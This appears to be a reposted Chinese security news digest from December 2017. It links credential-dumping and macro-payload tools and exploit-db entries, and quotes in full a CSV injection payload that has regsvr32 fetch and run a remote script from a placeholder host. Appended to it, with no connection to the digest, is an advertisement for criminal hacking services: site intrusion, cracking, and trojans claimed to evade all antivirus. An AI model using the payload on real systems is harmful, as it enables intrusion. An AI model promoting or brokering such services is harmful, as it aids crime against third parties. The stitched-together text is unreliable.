12月12日技术类安全热点

责声明">
[工具]一系列Powershell代码从内存中获取Wdigest密码 https://github.com/giMini/mimiDbg   [Tools] Invoke-MacroCreator:用于创建VBA宏的Word文档,各种有效负载的powershell脚本 https:...
[工具]一系列Powershell代码从内存中获取Wdigest密码 https://github.com/giMini/mimiDbg   [Tools] Invoke-MacroCreator:用于创建VBA宏的Word文档,各种有效负载的powershell脚本
https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator   [工具]用于从Vdex文件反编译和提取Android Dex字节码的工具 https://github.com/anestisb/vdexExtractor   [工具]用于Android的IDA调试插件
https://github.com/zhkl0228/AndroidAttacher   [漏洞]联想OEM安装的crapware附带了一个很好的代码执行功能!可用于绕过应用白名单或privesc(来宾帐户给主用户)
http://riscy.business/2017/12/lenovos-unsecured-objects/   [工具] Linux内存加密密钥提取工具
https://github.com/cryptolok/crykex   [教程]在Debian 7.5 mipsel上运行Metasploit Ci20
https://astr0baby.wordpress.com/2017/12/10/running-metasploit-framework-on-debian-7-5-mipsel-ci20/   不要使用powershell.exe通过.csv文件获取shell fillerText1,fillerText2,fillerText3,=MSEXCEL |'\ . \ . \ . \ Windows \ System32 \ regsvr32/s/n/u/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!'' https://twitter.com/G0ldenGunSec/status/939215702073991168   [漏洞] iOS/macOS - 由于IOSurfaceRootUserClient不尊重MIG所有权规则而导致内核双重释放
https://www.exploit-db.com/exploits/43320/   [漏洞] MikroTik 6.40.5 ICMP - 拒绝服务
https://www.exploit-db.com/exploits/43317/ 本文最初由安全客户发布。 作者:安全关小系列2
如果转载,请注明出处: https://www.anquanke.com/post/id/90176黑客业务清单介绍及一般分类: 类别:攻击入侵破解开发 1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量] 2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。 3:破解业务类:软件,加密文件,二次打包,脱壳等。 4:二次开发业务清单:软件二次开发,源代码二次开发等 5:其他业务订单:特洛伊木马[通过所有防病毒],远程控制,特殊软件等 备注:未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间,请在咨询前阅读:业务交易流程及相关说明 注意:仅接受正式业务,个人无权接受。收集此内容。
  • 发表于 2017-12-12 08:00
  • 阅读 ( 1356 )
  • 分类:黑客技术

你可能感兴趣的文章

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

2107 篇文章

作家榜 »

  1. 黑客 2107 文章